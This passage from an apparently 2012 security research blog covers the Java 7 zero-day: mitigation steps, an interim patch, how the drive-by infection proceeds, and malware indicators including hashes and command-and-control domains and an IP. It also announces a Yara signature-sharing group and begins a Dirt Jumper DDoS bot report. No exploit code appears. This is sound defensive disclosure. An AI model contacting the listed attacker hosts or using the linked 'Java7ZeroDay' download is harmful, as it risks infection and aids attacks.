work, too). ~ Michael Schierl</blockquote>
Update: Aug 28, 2012<br />
<a href="http://www.mediafire.com/file/77f649zqu902xw6/Java7ZeroDay.zip">Download it </a><br />
<br />
by Michael Schierl<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQU3ATrL8b7pafGPuE27w4-URGanCPKadMjmIsqm-GsTRfFoLUwKLwEViJr0dEpCbBlCh4d2Nudtjsq-VZW78TRdx8r35DBpUQgcPLFre1ti6itct247oyc_Lq2DFleGbXXpDqvXZX8C1S/s1600/jj.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQU3ATrL8b7pafGPuE27w4-URGanCPKadMjmIsqm-GsTRfFoLUwKLwEViJr0dEpCbBlCh4d2Nudtjsq-VZW78TRdx8r35DBpUQgcPLFre1ti6itct247oyc_Lq2DFleGbXXpDqvXZX8C1S/s640/jj.png" width="630" /></a></div>
<br />
<br />
<b>Read Part I <a href="http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html">Java 7 0-Day vulnerability information and mitigation.</a></b><br />
<br />
<b>More details :</b><br />
<a href="http://immunityproducts.blogspot.com/2012/08/java-0day-analysis-cve-2012-4681.html">Aug. 28 More detailed analysis > "Immunity. Java 0day analysis (CVE-2012-4681) by Esteban"</a><br />
<a href="http://www.kahusecurity.com/2012/java-0-day-using-latest-dadongs-js-obfuscator/">Aug. 28 </a><a href="http://www.kahusecurity.com/2012/java-0-day-using-latest-dadongs-js-obfuscator/">Java 0-Day Using Latest Dadong’s JS Obfuscator by Kahu Security</a><br />
<a href="http://www.kb.cert.org/vuls/id/636312">Aug. 28 US CERT: We are currently unaware of a practical solution to this problem. Disable Java in your browser</a><br />
<br />
<b style="background-color: #4f626e; color: #daf1ff; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14px; line-height: 20px; text-align: center;"><a href="http://zulu.zscaler.com/research/java_version.html" style="color: #fbb917; text-decoration: none;" target="_blank">CLICK HERE TO SEE IF YOU ARE VULNERABLE</a> (Zscaler) </b>
<br />
<br />
The Zscaler tool checks the version of Java used by your browser. If it is below 1.7_7, you need to update it from Java.com. If it is 1.7_ 7 already, you are safe (for now). As of Aug 31, 2012, the Zscaler checker prints "vulnerable for 0-day" for a ALL versions above 1.6, they just need to update the tool. In reality, if you have the latest version of Java, you are not vulnerable to this exploit.<br />
In general, you don't need Java plug-ins in browser, best to keep it turned off. You can still use Java desktop apps.<br />
<br />
<br />
<b style="background-color: #4f626e; color: #daf1ff; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: x-small; line-height: 15px;"><a href="http://sempersecurus.blogspot.com/" style="color: #fbb917; text-decoration: none;">Andre' M. DiMino</a> and <a href="http://contagiodump.blogspot.com/" style="color: #fbb917; text-decoration: none;">Mila Parkour</a></b><br />
<blockquote>
</blockquote>
</div>
</div>
</div>
Mila Parkourhttp://www.blogger.com/profile/05026389826489033821noreply@blogger.com12tag:blogger.com,1999:blog-74827929652568895.post-2820850963424722952012-08-27T03:00:00.000-04:002012-08-31T08:26:38.042-04:00Java 7 0-Day vulnerability information and mitigation.<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<span style="color: #f1c232; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="font-size: 14px; line-height: 20px;"><b>Update Aug.30, 2012</b></span></span></div>
<div style="text-align: left;">
<a href="http://www.oracle.com/technetwork/java/javase/7u7-relnotes-1835816.html" target="_blank">Oracle issued update 7 (7u7), which fixed the vulnerability</a><br />
<b style="color: #f1c232; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14px; line-height: 20px;"><br /></b>
<b style="color: #f1c232; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14px; line-height: 20px;"> </b></div>
</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggVS3ncBNg1Qpr937PvPNP2KZZvsv0EDhZHDM5Y1YkXeI_byaLIwnzYWkWg6a2ZVEzrxzMayp5R4KuJRyii5j9qYQM3yMYfrPzZ7xR7K8AeklMe_Ftlv5MrcrY5rwCVPbVuZGjkZSwYkwU/s1600/storm.jpg" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggVS3ncBNg1Qpr937PvPNP2KZZvsv0EDhZHDM5Y1YkXeI_byaLIwnzYWkWg6a2ZVEzrxzMayp5R4KuJRyii5j9qYQM3yMYfrPzZ7xR7K8AeklMe_Ftlv5MrcrY5rwCVPbVuZGjkZSwYkwU/s200/storm.jpg" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: right;"><span style="font-size: xx-small;">img.kids.discovery.com</span>
</td></tr>
</tbody></table>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggVS3ncBNg1Qpr937PvPNP2KZZvsv0EDhZHDM5Y1YkXeI_byaLIwnzYWkWg6a2ZVEzrxzMayp5R4KuJRyii5j9qYQM3yMYfrPzZ7xR7K8AeklMe_Ftlv5MrcrY5rwCVPbVuZGjkZSwYkwU/s1600/storm.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a>The cat is out of the bag. There is a 0-day out there currently being used in targeted attacks. The number of these attacks has been relatively low, but it is likely to increase due to the fact that this is a fast and reliable exploit that can be used in drive-by attacks and all kinds of links in emails. Interestingly, <a href="https://twitter.com/MarkWuergler/statuses/233919816463941632">Mark Wuergler mentioned on August 10 </a>that VulnDisco SA CANVAS exploit pack now has a new Java 0-day. It makes you wonder if it is the same exploit that leaked from, or was found in the wild and then added to the CANVAS pack. Or if it is totally unrelated and there are two 0-day exploits now.<br />
<br />
The purpose of this post is not to provide the vulnerability analysis or samples, but to offer additional information that may help prevent infections on some targeted networks. <a href="http://krebsonsecurity.com/2012/03/new-java-attack-rolled-into-exploit-packs/">We all know what kind of damage Java vulnerabilities can cause</a> if used in drive by exploits or in exploit packs. We believe that revealing technical vulnerability details in the form of a detailed technical analysis before the patch is dangerous, and releasing working exploits before the patch is vain and irresponsible.<br />
<br />
The Oracle patch cycle is 4 months (middle of February, June, October) with bugfixes 2 months after the patch. The next patch day is October 16 - almost two months away. Oracle <a href="http://threatpost.com/en_us/blogs/sun-about-face-out-cycle-java-update-patches-critical-flaw-041510">almost never issue</a> out-of-cycle patches but hopefully they will do consider it serious enough to do it this time.<br />
<br />
We have been in contact with <a href="http://schierlm.users.sourceforge.net/">Michael Schierl</a>, the Java expert who discovered a number of Java vulnerabilities, including recent the Java Rhino CVE-2011-3544 / ZDI-11-305 and CVE-2012-1723. We asked him to have a look at this last exploit . Michael sent his detailed analysis, which we will publish in the nearest future and a patch , which we offer on a per request basis today.<br />
<br />
<strike> The reason for limited release is the fact that this patch can be reversed, thus making the job of exploit creation easier, which certainly is not our goal.</strike><br />
Update Aug.29<br />
<i style="background-color: #4f626e; color: #daf1ff; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14px; line-height: 20px;">At this point the patch is by request is not to preserve the code but limit it to IT administrators and developers who can test and decide if they want to deploy. We do not want to push/offer it to 3 billion end Java users, it wasn't tested in all the possible scenarios and systems.</i><br />
<blockquote class="tr_bq" style="background-color: #4f626e; color: #daf1ff; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14px; line-height: 20px;">
<ul style="line-height: 1.4; list-style-image: initial; list-style-position: initial; margin: 0.5em 0px; padding: 0px 2.5em;"></ul>
</blockquote>
<br />
<a href="http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html">Atif Mushtaq from FireEye</a> covered the payload part of the exploit, which is helpful and something to look out for if you are protecting your network or your customers. We should note that attackers are not limited to .net addresses and already used other domains and IP addresses.<br />
<br />
The malicious executable name varies and it the future may get replaced by any kind of payload. At this point, it appears to be Poison Ivy RAT variant that is likely to be detected by many antivirus vendors. <br />
<br />
More about Poison Ivy<br />
<a href="http://labs.alienvault.com/labs/index.php/2012/nmap-script-to-detect-poison-ivy-clients/">Alienvault Nmap Script to detect Poison Ivy Clients</a><br />
<a href="http://hbgary.com/attachments/detectingpoisonivy.pdf">Will Brown: Detecting Poison Ivy </a><br />
<br />
<b>Details about the exploited vulnerability, mitigation factors and tips.</b><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd_-o1ySPidhNjMVYWmrsnoLVxPL88p661T5G9clZbIDw2tjIa4289tamtrxvHMF8OUQv614KJfCm4H0T3kA0b_CJBHtcQgjPnpVmVjMMyiIv-fBbQxU9fSS7ijA51Hhze73csLhD1p560/s1600/javaloading.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd_-o1ySPidhNjMVYWmrsnoLVxPL88p661T5G9clZbIDw2tjIa4289tamtrxvHMF8OUQv614KJfCm4H0T3kA0b_CJBHtcQgjPnpVmVjMMyiIv-fBbQxU9fSS7ijA51Hhze73csLhD1p560/s1600/javaloading.jpg" /></a>1. The javascript in index.html is heavily obfuscated.<br />
2. This vulnerability affects Java 7 (1.7) Update 0 to 6. Does NOT affect Java 6 and below.<br />
3. It works in all common browsers <strike>versions of Internet Explorer, Firefox, and Opera</strike>. <strike>Does NOT work in Chrome</strike>. <i>(Update: The original exploit we tested did not affect Chrome. We did not test Metasploit but reports are that their module works for all browsers. Disable java support in your browser)</i><br />
3. It does not crash browsers (which does NOT mean it does not work!), the landing page looks like a blank page <i>(for the original exploit only. Future variants may be different),</i> sometimes one may see a flash of a rotating Java logo and the word "Loading"<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTQGUEZO_EzIMhGMODzDRHJNY8Y6eTyDmyJ03KIKv9uB1tihEUA3wwVO_8uMy5a0TI5CgDT9J8hXo6TqO0nK32mQdx56QAb7BQxyit3_PhCLkhVWEma0KxRl16cUezHUMMwSu4qYt72PV-/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTQGUEZO_EzIMhGMODzDRHJNY8Y6eTyDmyJ03KIKv9uB1tihEUA3wwVO_8uMy5a0TI5CgDT9J8hXo6TqO0nK32mQdx56QAb7BQxyit3_PhCLkhVWEma0KxRl16cUezHUMMwSu4qYt72PV-/s320/3.png" width="320" /></a></div>
5. The malicious Java applet is downloaded like you see on the picture below. At this point, if your system is not vulnerable or is patched, the attack stops. From the user perspective, it is impossible to tell if the attack was successful or not.<br />
6. If the exploit is successful, it downloads and executes a malicious binary, which calls to another IP address/domain hello.icon.pk / 223.25.233.244 <br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTizzTBllo08sJ18hHwGXOHwO6mrmvVYDI1TiFh6r-EgUy1cuhvPqu2W7g35N15iCavj9sIbG6_mHjiiMV77vNE54KyF8eyMlCBTjy62pHmt9b2LfeQrZvYOsKLM0sR4y2qSEhPOLZFlAF/s1600/unpatchedie.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTizzTBllo08sJ18hHwGXOHwO6mrmvVYDI1TiFh6r-EgUy1cuhvPqu2W7g35N15iCavj9sIbG6_mHjiiMV77vNE54KyF8eyMlCBTjy62pHmt9b2LfeQrZvYOsKLM0sR4y2qSEhPOLZFlAF/s400/unpatchedie.png" width="290" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">img.1</td></tr>
</tbody></table>
7. Although older Java is not vulnerable to this attack, downgrading is not recommended due to many other vulnerabilities in the older versions of Java.<br />
8. Disable Java in your browser, apply the patch (see below), or <strike>use Chrome.</strike><br />
<br />
<b>Malware behavior and indicators</b><br />
Payload: : hi.exe Size: 16896<br />
MD5: 4A55BF1448262BF71707EEF7FC168F7D <a href="https://www.virustotal.com/file/09d10ae0f763e91982e1c276aad0b26a575840ad986b8f53553a4ea0a948200f/analysis/">(Virustotal 26/42)</a><br />
<br />
<ol>
<li>Legitimate Portable Media Serial Number Service <b><span style="font-family: Courier New, Courier, monospace;">MsPMSNSv.dll</span></b> is deleted from C\WINDOWS\system32 <a href="https://www.virustotal.com/file/1dea8005220a3efec6e32a7de4386026ccc1e5328e2fdcb82b1fb335905d1962/analysis/">(Virustotal 0/42)</a></li>
<li>Malicious <span style="font-family: Courier New, Courier, monospace;"><b>mspmsnsv.dll </b></span>is copied to C\WINDOWS\system32 <a href="https://www.virustotal.com/file/3564e5fbd74ed4e6c129b8209fae3daa126e7bd422625ad02d617bde9c6c42fe/analysis/">(Virustotal 21/42)</a></li>
<li> "Portable Media Serial Number Service" (WmdmPmSN in the registry) is running.</li>
</ol>
<b><span style="color: #ffe599;">Update Aug 30, 2012 </span></b><br />
<b><span style="color: #ffe599;">The vulnerability has been patched today. Please see the note on the top of the post.</span></b><br />
<strike><br /></strike>
<b><strike>Patch Readme:</strike></b><br />
<blockquote class="tr_bq">
Java 7 Zero Day Buster<br />
by Michael 'mihi' Schierl, <schierlm at gmx.de>, http://schierlm.users.sourceforge.net/<br />
To use, locate the <span style="font-family: Courier New, Courier, monospace;">(jre/)lib/security</span> folder in your JDK/JRE (there should be a<br />
file called<span style="font-family: Courier New, Courier, monospace;"> cacerts</span> in it), create a folder (<span style="font-family: Courier New, Courier, monospace;">jre/)lib/endorsed</span> next to it and<br />
place this Jar inside it.</blockquote>
<blockquote class="tr_bq">
The Java VM will load all Jar files in this folder and replace any of its own runtime classes (from rt.jar) by .class files inside of these Jars. Note that this feature is not officially supported by Sun/Oracle except for updating XML parser libraries, but it seems to work.</blockquote>
<blockquote class="tr_bq">
Use this Jar only for Java 7 Update 0 to 6, as other versions may have a different version of the patched class and break horribly. The patch seems to properly block the access vector used by the 0-day circulating at the moment, but I take no responsibility that it fixes all ways this bug can be exploited, nor that it will not break any other existing Java programs.</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
In other words, create a folder under<span style="color: #f1c232;"> <span style="font-family: Courier New, Courier, monospace;">lib</span></span> in your Java 7 program folder, name it <span style="color: #f1c232; font-family: Courier New, Courier, monospace;">endorsed</span>, copy the patch jar in it and restart the browser(s).<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
We tested and it works well - the applet gets downloaded but does not lead to download and execution of the malicious binary. See the pictures below and compare with the download sequence during the successful exploit (img 1.)<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: center;">
<b> Interim patch results </b></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxq9EV6t7bdOSVarlcK5yQKNQ0hGPvVsJhY05mi8aruw8VfgiMG3D11VJQ-PCT-sLZ2sR1kGR_EKsQdbGOQXNA4UMb86K1UQL7F1leL3pzqJd5Z34i_AArhLO6esEa6GJ2PDVlb-gU6NYD/s1600/patchedie.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxq9EV6t7bdOSVarlcK5yQKNQ0hGPvVsJhY05mi8aruw8VfgiMG3D11VJQ-PCT-sLZ2sR1kGR_EKsQdbGOQXNA4UMb86K1UQL7F1leL3pzqJd5Z34i_AArhLO6esEa6GJ2PDVlb-gU6NYD/s400/patchedie.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Patched Java 7 with Internet Explorer. No malicious exe download.</td></tr>
</tbody></table>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXRkXkrQBkVcdMcozWaijmm-U9nA1cpRVQqdaSu7Uo0_Vc8Vv6kDHnCkXcAl5dWpXdTRt4q3R_tV6v4EZDWv0iOarbxImucc1YfRSBNz0g_VXM8nmrGeWd9YR0O8HAoHqxwOwKnHN4ilo4/s1600/firefoxpatched.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXRkXkrQBkVcdMcozWaijmm-U9nA1cpRVQqdaSu7Uo0_Vc8Vv6kDHnCkXcAl5dWpXdTRt4q3R_tV6v4EZDWv0iOarbxImucc1YfRSBNz0g_VXM8nmrGeWd9YR0O8HAoHqxwOwKnHN4ilo4/s400/firefoxpatched.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Patched Java 7 with Firefox. No malicious exe download.</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfwivNb5nyxCLF4Fn4f1Z4V7KNAP1SuVnQLOhLQTd4yrO398cRKVX68pOUz90RjvnYMaNmAuQ6cBmqtq4tT3KUQk8ouGwV8t-Pq1G7no08k1VRgT0dkneslOvzPNz8GnJTsuwfhOE1jQxx/s1600/chrome.JPG" imageanchor="1"><img border="0" height="83" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfwivNb5nyxCLF4Fn4f1Z4V7KNAP1SuVnQLOhLQTd4yrO398cRKVX68pOUz90RjvnYMaNmAuQ6cBmqtq4tT3KUQk8ouGwV8t-Pq1G7no08k1VRgT0dkneslOvzPNz8GnJTsuwfhOE1jQxx/s1600/chrome.JPG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Java permission request on Chrome</td></tr>
</tbody></table>
<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioZexhurw2xwcufUs7C2-AObleE4ACMKpC43ukqFHManCmiFySiJVltcvNEadsFXyTgKoGqqlDsEr3WZwAf2zeODzUAG4LSUFSqbaHg_xatLNPg19Zz5UTfWAwp19XCifSnlFA8COsNleT/s1600/chrome2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"><img border="0" height="70" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioZexhurw2xwcufUs7C2-AObleE4ACMKpC43ukqFHManCmiFySiJVltcvNEadsFXyTgKoGqqlDsEr3WZwAf2zeODzUAG4LSUFSqbaHg_xatLNPg19Zz5UTfWAwp19XCifSnlFA8COsNleT/s400/chrome2.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Win XP sshot. No malicious exe download on Chrome (tested on XP and Windows 7)</td></tr>
</tbody></table>
<br />
<a href="https://community.rapid7.com/community/metasploit/blog/2012/08/27/lets-start-the-week-with-a-new-java-0day">Rapid7 / Metasploit </a>indicate that they tested their module on Chrome on Windows XP. In our experience, if Java is allowed to run like you see on the picture above, the malicious binary does not get downloaded. We tested several times with the same results - Java runs but no contact with the second server and binary download. Testing on the same VM with Internet Explorer or Firefox immediately causes infection. Don't know, maybe Rapid 7 'improved' the exploit and you can send them your thanks if you wish, but the original exploit does not work on Chrome.<br />
<b><br /></b>
<b>Requesting the patch:</b><br />
<br />
This is not an official patch and had limited testing. In general, it is best to disable Java in your browser <strike>or use Chrome.</strike><br />
If you are in the environment where you must have Java with Internet Explorer, Firefox and Opera, email us at<span style="color: #ffd966;"> <b>admin <at> deependresearch.org</b></span> from your company address with a brief explanation of the planned use and we will send you the download link.<br />
<br />
If you are in the exploit making business,'whitehat' or not, please do not bother.<br />
If you are a home user and/or do not need use it to protect users, customers, and networks, please use the workarounds.<br />
<br />
Feel free to contact Oracle and ask them about their patch cycles. You can also contact Rapid 7 and ask if they ever heard of "<a href="http://en.wikipedia.org/wiki/Social_responsibility">Social responsibility</a>" .<br />
<br />
We want to thank Michael 'mihi' Schierl for his analysis and patch development and anonymous for the sample donation.<br />
<br />
<b style="text-align: center;"><a href="http://zulu.zscaler.com/research/java_version.html" style="text-align: center;" target="_blank">CLICK HERE TO SEE IF YOU ARE VULNERABLE</a> (Zscaler) </b><br />
<br />
The Zscaler tool checks the version of Java used by your browser. If it is below 1.7_7, you need to update it from <a href="http://java.com/">Java.com</a>. If it is 1.7_ 7 already, you are safe (for now). As of Aug 31, 2012, the Zscaler checker prints "vulnerable for 0-day" for a ALL versions above 1.6, they just need to update the tool. In reality, if you have the latest version of Java, you are not vulnerable to this exploit.<br />
In general, you don't need Java plug-ins in browser, best to keep it turned off. You can still use Java desktop apps.<br />
<br />
<br />
<b>Continue to Part II <a href="http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html"> Java 7 0-Day vulnerability analysis </a></b><br />
<div>
<br />
<span style="font-size: x-small;"><b><a href="http://sempersecurus.blogspot.com/">Andre' M. DiMino</a> and <a href="http://contagiodump.blogspot.com/">Mila Parkour</a></b></span>
</div>
</div>
Mila Parkourhttp://www.blogger.com/profile/05026389826489033821noreply@blogger.com30tag:blogger.com,1999:blog-74827929652568895.post-76978580946057935022012-08-08T23:46:00.000-04:002014-05-13T23:00:20.539-04:00Yara Signature Exchange Google Group<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO8-BkCQvcEBXcr524otq87rLsF0ejLaPh5XtST7XTZKPcTbmXQzjU7mIrdiaqsOt5QhWQBzn4ELquTQ7nSTnf1mrZubBAMaqwUspAWFNZkwbfr_KDljGqhiw4tHF-w4tJTU1vFOui3EYE/s1600/yaraexchange.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO8-BkCQvcEBXcr524otq87rLsF0ejLaPh5XtST7XTZKPcTbmXQzjU7mIrdiaqsOt5QhWQBzn4ELquTQ7nSTnf1mrZubBAMaqwUspAWFNZkwbfr_KDljGqhiw4tHF-w4tJTU1vFOui3EYE/s320/yaraexchange.png" height="69" width="320" /></a><b>Yara-Exchange Google Group (by invitation only)</b><br />
<a href="https://groups.google.com/d/forum/yaraexchange">https://groups.google.com/d/forum/yaraexchange</a>
<br />
<br />
<br />
<br />
Please read the <b><span style="color: #bf9000;">Yara Exchange Group rules below</span></b> and if you are interested, request an invitation by sending an email from your organization's email account to to <b>Yara at deependresearch.org</b> (currently moderated by <a href="http://sempersecurus.blogspot.com/">Andre' M. DiMino</a>)<br />
<br />
Please provide the following information:<br />
<ul style="text-align: left;">
<li>Your First & Last Name (may not be a third party contact)</li>
<li>Your Organization and Address</li>
<li>Contact information for verification.<br /><br /><b>Once your membership is confirmed we will need your</b></li>
<li>Gmail Email address in order to join Google group. </li>
<li>Github ID (create at Github.com if you don't have) </li>
<li>Virustotal.com ID (create at virustotal.com if you don't have) <i>- optional but recommended</i></li>
</ul>
<i>You can send this information in the initial application email.</i><br />
<div>
<i><br /></i></div>
<div>
<i><br /></i>In short, we need name, work and Gmail email addresses, organization, and full contact info (City, Country). The requirement to use your work email for the initial request is mandated by the fact that not all indicators can be publicly shared.<br />
<br />
By registration, you agree that your group access will be used only by the person registered. No other distribution or public disclosure of this group's signatures is permitted. Although signatures shared will not be posted in public, please make sure that all information you send to this group comes from your own research, open sources, or you have permission (from other groups / researchers or your employer) to share it with the group.<br />
<br />
We are planning to have both crimeware and APT yara signatures. We can create an upload/malware hosting if necessary.<br />
<br />
<br />
Read more about Yara here<br />
<a href="http://code.google.com/p/yara-project/">http://code.google.com/p/yara-project/</a>
<br />
and a good explanation is <a href="http://blog.zeltser.com/post/4339793582/custom-signatures-for-malware-scan">here by Lenny Zeltser </a><br />
<br />
<br />
<b><span style="color: #f1c232; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Yara Exchange Group Rules</span></b><br />
<br />
1. DeepEnd Research is an all volunteer, non-commercial organization that derives no financial benefit from Yara signatures or anything else developed by the group. Our goal is to build a community of researchers with a mutual interest in developing, improving, and sharing Yara signatures.<br />
<br />
2. It's expected and required that <span style="color: #f1c232; font-family: inherit;"><b>everyone</b></span> will contribute to the list. "Yara Exchange" isn't there to just pull signatures or watch the conversations and not contribute anything back. While some initial silence is understood until our momentum builds, extended lack of participation won't be accepted.<br />
Contributing to the list can come in many forms including new signatures, improvements on existing signatures, tool integration using yara, analysis and classification techniques using yara, etc.<span style="color: #f1c232;"> <b>If you cannot share any signatures you develop or do not use yara often enough to contribute, please do not apply. </b></span><br />
<br />
3. Inactive members, or those that don't tangibly contribute to the signature development or sharing will be pinged to check on their status and removed after 3 months.<br />
<br />
4. A group roster will be distributed to group members on a regular basis. We believe that the roster will let us have more trust in each other, and a better understanding of who you are sharing your signatures with. The roster will consist of the list members and their organizations (Google group nick+real name+org/company). No email addresses , titles, or other personal information will be included. DeepEnd Research will never use your information for reasons not specified above.<br />
<br />
5<br />
a. Group access is granted only to the person registered. If you have colleagues and friends that you feel will be a good part of this group, have them request their own access.<br />
<br />
b. No sharing, distribution, or public disclosure of this group's signatures, analysis, or work product outside of the member's organization or "Yara Exchange" is permitted. Additionally, no signatures, analysis, or work product from "Yara Exchange" can be used commercially, or for other financial benefit, either directly or indirectly.<br />
<b>Usage explanation and examples:</b><br />
-You can use yara signatures produced by the group for operations at your company / organization and/or for incident response at your user / client / customer site.<br />
-You may not incorporate signatures shared by group members into any products / appliances / subscriptions / reports you sell or publications you produce.<br />
-You maintain ownership of signatures you create and submit to the group and you can use / sell them in any way you wish.<br />
If there are any questions or uncertainties about external use of "Yara Exchange" information, please ask!<br />
<br />
c. Please ensure that all information you share with "Yara Exchange" comes from your own research, open sources, or with permission. <br />
<br />
We hope these rules will prevent group stagnation and taking advantage of a few active participants by many idle members and companies. We look forward to working with you and hope this group develops and thrives. </div>
</div>
Mila Parkourhttp://www.blogger.com/profile/05026389826489033821noreply@blogger.com0tag:blogger.com,1999:blog-74827929652568895.post-11645623857005662612011-10-19T14:42:00.053-04:002011-10-19T14:58:10.552-04:00Dirt Jumper DDoS Bot - New versions, New targets<div style="font-family: Verdana,sans-serif;"><div><span style="font-size: small;">By <a href="http://sempersecurus.blogspot.com/">Andre' M. DiMino</a> & <a href="http://contagiodump.blogspot.com/">Mila Parkour</a></span><br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm5cmmon85ownx8IZ78wcDbUhjZSWJ_QhkZjxGuo22TQF5ugyddncaNZWzJ1qMFA9gCsgDui1MDB4Mp8fa02dJrfeI0vlT2J3c3FvN7ZU5r_p8hkio6NC9H3lNHEmXssi0fFounhUHC2DV/s1600/wipeout.jpg" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm5cmmon85ownx8IZ78wcDbUhjZSWJ_QhkZjxGuo22TQF5ugyddncaNZWzJ1qMFA9gCsgDui1MDB4Mp8fa02dJrfeI0vlT2J3c3FvN7ZU5r_p8hkio6NC9H3lNHEmXssi0fFounhUHC2DV/s200/wipeout.jpg" width="200" /></a></span></td></tr>
<tr align="right" style="color: #999999;"><td class="tr-caption"><span style="font-size: xx-small;">End-2012.com</span></td></tr>
</tbody></table><span style="font-size: small;">I recently encountered a malware sample that when sandboxed, exhibited a great deal of DDoS-like activity toward a large number of URLs. When I looked at the network traffic a bit more closely, it reminded me of the Dirt Jumper DDoS bot that I read about in an excellent <a href="http://asert.arbornetworks.com/2011/08/dirt-jumper-caught/">blog post by Curt Wilson</a> of Arbor Networks. This particular version of Dirt Jumper is attacking a variety of organizations and companies in many different countries. The MD5 of this sample is f29b1089b3f5e076d4d4bd2a3a02d3cb using the domain 'asdaddddaaaa.com' for its Command and Control (C&C). Searching for a similar network traffic pattern yielded a number of sandbox analysis pages containing several more C&C servers and DDoS victims. This research also highlighted a lack of proper detection of this bot variant. Many antivirus companies change the name of this bot across variants,<a href="http://www.virustotal.com/file-scan/report.html?id=02422d93668f19b8057064998e228316a2a2ff9c8aacb2968c9567da21e48dd6-1315528286%20"> detecting it as zbot, pinkslipbot, Kryptic and others</a>. </span><span style="font-size: small;">Microsoft at least consistently detects Dirt Jumper as Dishigy.B, (Dishigy.A is a non-related keylogger with binary in the same directory) and this allowed us to find more examples and prompted further research. Dirt Jumper is proving to be as popular as <a 